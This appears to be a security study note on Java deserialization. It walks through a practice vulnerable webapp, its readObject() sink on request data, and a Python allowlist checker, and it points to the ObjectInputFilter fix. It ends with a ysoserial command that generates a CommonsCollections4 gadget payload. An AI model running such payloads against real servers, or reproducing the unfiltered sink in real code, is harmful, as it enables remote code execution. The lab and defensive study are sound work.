# Summary

## Structure

```bash
$ javac POC.java ; java POC
POC Serialized object saved to serialized.object
```

![hexdump -C serialized.object](/files/-MCCAehYrubgG4xgWQZh)

The first four bytes, `ac ed 00 05`, are the well-known signature of a Java serialized object (`rO0` when Base64-encoded).

## Practising with Ysoserial

{% embed url="<https://github.com/hvqzao/java-deserialize-webapp>" %}

### Entry point

#### Servlet.java:38 `Serial.fromBase64(data);`

This line calls `fromBase64()` on the `Serial` class (loaded from `Serial.java`), passing it the value of the POST `data` parameter.

#### Serial Class

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Assumed import: the instance-method API used below (decode(String),
// encodeToString(byte[])) matches Apache Commons Codec's Base64.
import org.apache.commons.codec.binary.Base64;

public class Serial {

    // Deserialization sink: the Base64 text comes straight from the request
    // and readObject() instantiates whatever classes the stream names.
    public static Object fromBase64(String s) throws IOException, ClassNotFoundException {
        byte[] data = new Base64().decode(s);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
        Object o = ois.readObject();
        ois.close();
        return o;
    }

    // Inverse operation: serialize an object and Base64-encode the stream.
    public static String toBase64(Serializable o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();
        return new Base64().encodeToString(baos.toByteArray());
    }
}
```

#### Decoding Base64-encoded object

```java
byte[] data = new Base64().decode(s);
```

#### Reading Object

```java
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
Object o = ois.readObject();
```

This is the sink: `readObject()` deserializes whatever classes the stream names, so a malicious payload executes at this line, before the returned `Object` is even used.
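The two facts above (the `ac ed 00 05` / `rO0` signature, and that `readObject()` instantiates whatever class the stream names) can be checked out of process, before the bytes reach the JVM. The following Python checker is an added example, not code from this page or from the java-deserialize-webapp project: it recognises the signature in raw and Base64 form, reads the top-level class name directly from the stream's first class descriptor without deserializing anything, and compares it with an allowlist. The class names `com.example.Note` / `com.example.Other` and the zeroed serialVersionUID are constructed for the demonstration.

```python
import base64
import binascii
import struct

# Tag values from the Java Object Serialization Stream Protocol.
STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = 5
TC_NULL = 0x70
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_STRING = 0x74
TC_ARRAY = 0x75
TC_ENDBLOCKDATA = 0x78
TC_ENUM = 0x7E
SC_SERIALIZABLE = 0x02

HEADER = STREAM_MAGIC + struct.pack(">H", STREAM_VERSION)   # ac ed 00 05


def is_java_serialized(blob):
    """Raw-byte check for the ac ed 00 05 signature."""
    return blob[:4] == HEADER


def looks_like_base64_java_stream(text):
    """Base64 of ac ed 00 05 always starts with 'rO0'."""
    return text.startswith("rO0")


def top_level_class(blob):
    """Name of the first class described in the stream, read without
    deserializing. Returns None when the first element is not a plain
    class descriptor (e.g. a proxy class or a back-reference)."""
    if not is_java_serialized(blob):
        raise ValueError("not a Java serialization stream")
    if len(blob) < 8:
        return None
    tag = blob[4]
    if tag == TC_STRING:
        return "java.lang.String"
    if tag not in (TC_OBJECT, TC_ARRAY, TC_ENUM) or blob[5] != TC_CLASSDESC:
        return None
    (name_len,) = struct.unpack(">H", blob[6:8])
    if len(blob) < 8 + name_len:
        return None
    return blob[8:8 + name_len].decode("utf-8", errors="replace")


def check_data_parameter(param, allowlist):
    """Triage a POST 'data' value: is it a Java stream, and is its top-level
    class on the allowlist? Returns (accepted, reason)."""
    if not looks_like_base64_java_stream(param):
        return False, "not a Base64-encoded Java serialization stream"
    try:
        blob = base64.b64decode(param, validate=True)
    except (binascii.Error, ValueError):
        return False, "malformed Base64"
    try:
        cls = top_level_class(blob)
    except ValueError as exc:
        return False, str(exc)
    if cls is None:
        return False, "first element is not a plain class descriptor"
    if cls not in allowlist:
        return False, "class %s not in allowlist" % cls
    return True, cls


def build_sample_stream(class_name):
    """Constructed test input: a minimal stream for a field-less Serializable
    class. The serialVersionUID is a zero placeholder, not a real value."""
    name = class_name.encode("utf-8")
    return (HEADER
            + bytes([TC_OBJECT, TC_CLASSDESC])
            + struct.pack(">H", len(name)) + name
            + b"\x00" * 8                        # serialVersionUID (placeholder)
            + bytes([SC_SERIALIZABLE])           # classDescFlags
            + b"\x00\x00"                        # field count: 0
            + bytes([TC_ENDBLOCKDATA])           # end of class annotations
            + bytes([TC_NULL]))                  # no superclass descriptor


def sample_param(class_name):
    """Base64 form of the constructed stream, as it would arrive in 'data'."""
    return base64.b64encode(build_sample_stream(class_name)).decode("ascii")


if __name__ == "__main__":
    allowed = frozenset({"com.example.Note"})          # hypothetical app class
    for cls in ("com.example.Note", "com.example.Other"):
        print(cls, check_data_parameter(sample_param(cls), allowed))
    print("Base64 prefix:", sample_param("com.example.Note")[:4])
```

Only the first class descriptor is inspected, so classes nested deeper in the object graph are not seen; this makes the checker a triage and detection aid (for request logs or a WAF rule) rather than a replacement for the in-JVM fix, which is to set an `ObjectInputFilter` (JEP 290, Java 9+) on the `ObjectInputStream` so that every class the stream resolves is filtered.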

### Identifying vulnerable loaded classes

This webapp is compiled with `commons-collections4:4.0` on its classpath (`target/bin/webapp`, line 80), and that library is also listed in ysoserial's vulnerable classes list.

### Ysoserial payload generation

```bash
java -jar ysoserial.jar CommonsCollections4 'touch /tmp/worked'
```
